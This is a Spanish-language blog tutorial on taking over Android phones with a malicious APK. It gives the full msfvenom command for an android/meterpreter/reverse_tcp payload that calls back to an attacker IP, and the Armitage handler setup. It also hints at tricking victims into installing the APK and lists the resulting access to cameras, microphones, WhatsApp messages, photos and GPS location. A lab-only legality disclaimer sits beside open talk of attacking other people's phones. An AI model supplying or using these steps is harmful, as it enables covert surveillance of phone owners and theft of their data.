En esta ocasión el blog se enorgullece en presentar un tutorial completo sobre una de las técnicas mas factibles para hackear un celular o un dispositivo cuyo sistema operativo sea android. Para ello lo que haremos es que, a través de armitage y Msfvenom, dos programas gratuitos que viene en las distribuciones de análisis de seguridad como kali o parrot.

1) inicialización del entorno de ataque

Lo primero que haremos para poder realizar nuestra práctica es reconocer a nuestro objetivo. Dado que el blog tiene una política de 100% legalidad, todas las prácticas aquí realizadas se realizaron con dispositivos propios del autor y desde un laboratorio de pentesting generado exactamente con el fin de realizar pruebas legales. Sin mas preámbulos, empecemos con el tutorial.


Primero que nada y para que funcione el armitage, inicializaremos el postgresql con la siguiente orden en distribuciones linux basadas en debian en una nueva consola:

service postgresql start


luego inicializaremos armitage con la orden desde la consola también:

armitage

Esto inicializará el armitage. Por el momento lo dejamos quieto mientras trabajamos con el msfvenom

2) creamos el Apk maligno con Msfvenom


Para ello, abrimos una nueva consola y tecleamos:

msfvenom -p android/meterpreter/reverse_tcp lhost=xxx.xxx.xxx.xxx lport=8888 R >/root/Escritorior/nombredenuestroapkmaligno.apk

donde:

msfvenom : inicializa msfvenom

android/meterpreter/reverse_tcp: creamos una conexion tcp reversa para saltarnos los protocolos de seguridad de la maquina objetivo.

lhost: La dirección IP de nuestro localhost. En una red local es la interna. Para ataques a un dispositivo fuera de la red LAN utilizar la ip publica.

lport: el puerto local donde recibiremos la conexion. este debe estar abierto en la maquina objetivo para poder realizar el ataque.

/root/Escritorior/nombredenuestroapkmaligno.apk : La ruta y el nombre del archivo a guardar.

3) Creamos el handler (El servidor de nuestro lado)


Luego vamos al armitage y en los ataques de la izquierda buscamos android/meterpreter/reverse_tcp, con lo cual se abrirá una pequeña ventana donde ingresaremos el localhost y el puerto local de nuevo. OJO que estos coincidan con los que creamos en el archivo de msfvenom o no servirá el ataque, ojito y recordadlo. Esto lo que hará es inicializar el handler a la escucha de una posible conexión, la cual crearemos enviando el apk maligno al dispositivo con android.

Recordatorio: este ataque sirve para android hasta el 5.1, de ahi en adelante es un poco mas difícil hacerlo, pero también es posible. Eso lo dejaremos para un próximo tutorial.

4) instalar el apk maligno en el dispositivo

Aquí entra el paso de instalar el apk maligno en el dispositivo remoto objetivo. Aqui es facil ya que es un celular de mi propiedad, pero para hacerlo en otro celular deberás recurrir a toda clase de triquiñuelas extrañas para que te lo reciban, desactiven los protocolos de seguridad y lo instalen en su celular ( ya la seguridad ha avanzado mucho, eh?).


Una vez que esto suceda, ganaremos meterpreter en el dispositivo objetivo, lo cual nos dará potencialmente:

- El pase para poder ganar permisos de administración y así mismo, persistencia.
- acceso a dispositivos perimetrales como cámaras, micrófonos, auriculares, etc.
- Acceso a todos los archivos del celular, incluidas, fotos, conversaciones de whatsapp, y mensajes de texto.
- Permisos de añadir, borrar o modificar archivos
- posición gps del objetivo

Y hasta aquí el tutorial de hoy. No se explicará la persistencia en este momento, pero por lo pronto estos son los básicos de un hackeo de celular mediante la técnica del apk maligno. Recuerda que este es el hilo de la conversación sobre este tema en el blog y que cualquier pregunta que pongas en los comentarios la resolveremos entre todos los lectores y por supuesto su servidor, freakbizarro. Hasta la próxima.